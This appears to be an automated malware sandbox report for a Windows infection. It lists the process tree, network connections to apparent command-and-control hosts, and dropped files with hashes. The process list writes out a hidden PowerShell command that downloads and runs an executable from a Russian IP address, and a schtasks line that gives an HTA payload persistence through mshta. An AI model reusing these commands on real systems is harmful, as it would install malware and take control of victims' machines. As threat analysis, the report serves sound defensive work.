C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2364 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3244 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4244,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "jWtzpmatznG" /tr "mshta \"C:\Temp\9undwL0Qa.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\9undwL0Qa.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd14ff46f8,0x7ffd14ff4708,0x7ffd14ff4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE
"C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE"
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3ozmo" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe
"C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe"
C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe
"C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe
"C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe
"C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4932 -ip 4932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 808
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
| US | 8.8.8.8:53 | advertised.life | udp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:80 | ipinfo.io | tcp |
| DE | 109.120.178.136:80 | 109.120.178.136 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | fua.4t.com | udp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | e6.o.lencr.org | udp |
| GB | 2.23.210.82:80 | e6.o.lencr.org | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 172.217.169.10:443 | ogads-pa.googleapis.com | udp |
| GB | 172.217.169.10:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 185.198.234.185:80 | cobolrationumelawrtewarms.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 104.21.42.12:443 | pirtyoffensiz.bet | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | breakfasutwy.cyou | udp |
| US | 8.8.8.8:53 | importenptoc.com | udp |
| US | 8.8.8.8:53 | voicesharped.com | udp |
| US | 8.8.8.8:53 | inputrreparnt.com | udp |
| US | 8.8.8.8:53 | torpdidebar.com | udp |
| US | 8.8.8.8:53 | rebeldettern.com | udp |
| US | 8.8.8.8:53 | actiothreaz.com | udp |
| US | 8.8.8.8:53 | garulouscuto.com | udp |
| US | 8.8.8.8:53 | breedertremnd.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | outlinedtrai.bet | udp |
| US | 172.67.218.33:443 | outlinedtrai.bet | tcp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
Files
memory/428-0-0x00000000008C0000-0x0000000000D89000-memory.dmp
memory/428-1-0x0000000077014000-0x0000000077016000-memory.dmp
memory/428-2-0x00000000008C1000-0x0000000000929000-memory.dmp
memory/428-3-0x00000000008C0000-0x0000000000D89000-memory.dmp
memory/428-4-0x00000000008C0000-0x0000000000D89000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
| MD5 | 78ec3bb0db3cee811be50f99dd89e2fe |
| SHA1 | 1ec0122be4458914a8b07c7b0bf34faf47d14c19 |
| SHA256 | f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5 |
| SHA512 | d36b32948ad76a558bbb3dbcbbdfeb911f581ab59b4a7502c09e5b4479b0fe9976cd473870f7dd7717da5c2639817c9990388d39f42e712410533b04893da082 |
memory/428-16-0x00000000008C0000-0x0000000000D89000-memory.dmp
memory/428-18-0x00000000008C1000-0x0000000000929000-memory.dmp
memory/1828-19-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1828-20-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1828-21-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1828-22-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1828-23-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1828-24-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1828-25-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1828-26-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1432-28-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1432-29-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1432-31-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1828-32-0x0000000000430000-0x00000000008F9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
| MD5 | 515748a93ce7beb3f4416ec66ba8488e |
| SHA1 | 3ba2f1a56dcc91967361622c56b1ba545cda4325 |
| SHA256 | a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6 |
| SHA512 | 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb |
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
| MD5 | 896dc9ae02a4b0cf429b4346a3990fae |
| SHA1 | 17f297bb4cf3acd07078fc5d73c1d6564a8c0710 |
| SHA256 | 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2 |
| SHA512 | e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c |
memory/4592-65-0x0000000000F70000-0x0000000001020000-memory.dmp
memory/4592-66-0x0000000005EA0000-0x0000000006444000-memory.dmp
memory/4008-70-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4008-68-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1828-71-0x0000000000430000-0x00000000008F9000-memory.dmp
memory/1952-72-0x000001C44F180000-0x000001C44F260000-memory.dmp
memory/1952-73-0x000001C44F2D0000-0x000001C44F382000-memory.dmp
memory/1952-74-0x000001C44F510000-0x000001C44F532000-memory.dmp
memory/1952-75-0x00007FF719E00000-0x00007FF71A2BB000-memory.dmp
memory/1952-77-0x000001C44F660000-0x000001C44F6D6000-memory.dmp
memory/1952-76-0x000001C44F590000-0x000001C44F5E0000-memory.dmp
memory/1952-78-0x000001C44F540000-0x000001C44F55E000-memory.dmp
memory/1828-79-0x0000000000430000-0x00000000008F9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
| MD5 | 87da0483aefde76a5086c5b2ea14304f |
| SHA1 | ae6b27aeaf487666c71b26397709004e65b09002 |
| SHA256 | 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f |
| SHA512 | ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4 |
memory/3380-96-0x0000000000400000-0x000000000086A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
| MD5 | 5b0bf9144e2661027c1621957b1ef278 |
| SHA1 | 589efc0736ecc18d94e4dd8d353502e8d76738c4 |
| SHA256 | a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f |
| SHA512 | e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177 |
C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta
| MD5 | f6484510eab66e7220c3c21ee3cd844d |
| SHA1 | f59ba92102679647ec2443690247fc056d9c0cde |
| SHA256 | 29ac523a18d55dfe3df8c1452168f8f2e7f7b53d3ed4bacbe71e04e3517eaf16 |
| SHA512 | 4fcb2e3114073796b62b1606568997a12a3a568d46ca2c4c984ab3658b0948d1c5706bc386483e772d5e089cb365b55d62d6abebef64327b2dd3d536db65772f |
memory/1960-123-0x0000000002EC0000-0x0000000002EF6000-memory.dmp
memory/1960-124-0x0000000005910000-0x0000000005F38000-memory.dmp
memory/1960-125-0x0000000006040000-0x0000000006062000-memory.dmp
memory/1960-127-0x0000000006180000-0x00000000061E6000-memory.dmp
memory/1960-126-0x0000000006110000-0x0000000006176000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbk51waj.54i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1960-137-0x0000000006330000-0x0000000006684000-memory.dmp
memory/1960-138-0x0000000006850000-0x000000000686E000-memory.dmp
memory/1960-139-0x00000000068A0000-0x00000000068EC000-memory.dmp
\??\pipe\crashpad_4072_LJADQDXCUVROZVCW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1960-149-0x00000000081A0000-0x000000000881A000-memory.dmp
memory/1960-150-0x0000000006DA0000-0x0000000006DBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/1828-183-0x0000000000430000-0x00000000008F9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 6195a91754effb4df74dbc72cdf4f7a6 |
| SHA1 | aba262f5726c6d77659fe0d3195e36a85046b427 |
| SHA256 | 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5 |
| SHA512 | ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e66d6452cb50e1008429a093a9204ad6 |
| SHA1 | b8f17762a4f4d5fc84675b617df9d76819416e59 |
| SHA256 | 20280a658e0c42f6a97290f6977154c97560649ddb10aa0e8f031d52b959f6c3 |
| SHA512 | 27f4d0f2e9ec2448e8f160d7ab783deda49be107295928a19db61b7f8a13f823a07f1775d72ca4c5f9a797a174d0c169e7c259d7760c8e7d762fb6a10932f51b |
memory/3380-209-0x0000000000400000-0x000000000086A000-memory.dmp
memory/3380-208-0x0000000000400000-0x000000000086A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4fcd87aa23c368499610af097ad0bfed |
| SHA1 | 5645b817b1ec4480fa13277219a07061f36b048b |
| SHA256 | f147de78e401af351471727cd1c338aa28ccf58a4077aae9f6ec4fa387669823 |
| SHA512 | 37361b08a7aa55a4f7829acae8b682434f0d29d6a8eda64236d0ecfb819a22c3c9bdab7c578d10f40ff05ff1eecd90c58cf268ae17011b3ff04ffe6058b53449 |
C:\Temp\9undwL0Qa.hta
| MD5 | 16d76e35baeb05bc069a12dce9da83f9 |
| SHA1 | f419fd74265369666595c7ce7823ef75b40b2768 |
| SHA256 | 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7 |
| SHA512 | 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7367c09dd1bc160eef95328a43c62932 |
| SHA1 | a016bf8e7a50a43f74248a95548a200f79ebfd06 |
| SHA256 | f8d297cfe014d6c55fe14bfa53e1894f8b54114844bf948c19c960a1091499aa |
